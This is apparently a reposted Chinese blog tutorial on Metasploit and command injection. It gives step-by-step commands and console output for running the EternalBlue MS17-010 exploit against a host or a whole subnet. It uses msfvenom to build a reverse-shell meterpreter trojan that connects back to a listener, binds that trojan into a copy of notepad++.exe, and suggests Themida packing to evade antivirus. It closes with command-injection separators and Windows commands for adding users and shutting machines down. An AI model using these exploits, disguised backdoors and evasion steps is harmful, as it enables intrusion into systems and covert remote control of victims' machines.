http://wglj.pds.gov.cn/contents/12512/135136.html
kali渗透测试工具包
https://www.kali.org/tools/
metasploit
msf(metasploit framework)是一款开源安全漏洞和测试工具,集成了各平台上常见的溢出漏洞和流行的shell code,并保持更新。
# 进入msf工具前先将当前系统切换到root模式下
msfconsole init # 初始化并进入msf工具界面
msfconsole # 进入msf工具命令行界面
msf工具使用步骤:
使用模块—>配置模块必选项—>运行模块。
查找模块
search ms17_010
。
# 查找模块
search ms17_010 # 搜索微软2017年第10号漏洞
----------------------------------------------------------------------
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
-----------------------------------------------------------------------------------
进入模块
use exploit/windows/smb/ms17_010_eternalblue
。
# 使用模块,进入模块
use exploit/windows/smb/ms17_010_eternalblue # 进入永恒之蓝漏洞扫描工具
use 0 # 使用序号进入永恒之蓝漏洞扫描工具
----------------------------------------------------------------------------------
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
-----------------------------------------------------------------------------------
模块选项
show options
。
Required
参数为yes
则是必选项。
Payload options
为攻击载荷,即攻击后想要进行的操作。
meterpreter
是metasploit后渗透利器,渗透成功进入meterpreter工具命令行界面,输入help
命令即可查看工具帮助信息。
# 显示需要配置的选项
show options
------------------------------------------------------------
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
etasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 200
8 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2
, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows
7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.235.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
------------------------------------------------------------
设置选项
set RHOSTS 192.168.1.130
,设置该模块的RHOSTS选项的HOST IP值为192.168.1.139,同样也可以设置为一个范围,如set RHOSTS 192.168.1.0-254
,就会对整个范围的地址进行扫描攻击。
执行模块
run
。
msfvenom
生成远控木马
msfvenom
是用来生成后门的工具,在目标机器上执行后门,在本地监听目标上线。
此工具在shell中使用,不是在msfconsole终端中使用。
example:
# -p --> payload
# payload name --> 系统/架构/作用/方式
# payload setting --> lhost lport
# format output ---> -f
# exe ---> exe可执行文件
# -o ---> output, -o demo.exe 生成demo.exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=9999 -f exe -o demo.ext
------------------------------------------
# 以上步骤为生成一个木马程序,然后需要在当前系统中开启监听
开启监听:
在msfconsole中执行。
use exploit/mutil/handler
, show options查看参数选项,并使用set
命令配置payload和lhost、lport选项值,并执行run
命令运行。
# step1
use exploit/mutil/handler
# step2
set payload windows/x64/meterpreter/reverse_tcp
# step3
set lhost 192.168.1.1
# step4
set lport 9999
# step5
run
用户打开远控木马之后,控制机这边会进入meterpreter终端。
免杀配置
-
捆绑木马
将远控木马捆绑在正常程序中。
# -x --->附加到某正常程序中
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
-
加壳
压缩壳、加密壳。
Themida虚拟机加壳软件(可绕过火绒、腾讯等安全软件)。
命令执行漏洞
# 无论cmd1是否执行成功,cmd2都将被执行
cmd1|cmd2
# 无论cmd1是否执行成功,cmd2都将被执行
cmd1;cmd2
# 无论cmd1是否执行成功,cmd2都将被执行
cmd1&cmd2
# 仅在cmd1执行失败时才执行cmd2
cmd1||cmd2
# 仅在cmd1执行成功时才会执行cmd2
cmd1&&cmd2
---------------------------------------
# 常见Windows命令
whoami # 查看当前用户名
ipconfig # 查看网卡信息
shutdown -s -t 0 # 立即关机
net user [username] [password] /add # 添加用户名
type [file_name] # 查看filename文件内容
原文始发于微信公众号(不知名菜鸟):渗透测试工具之metasploit及服务器命令执行漏洞
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/170830.html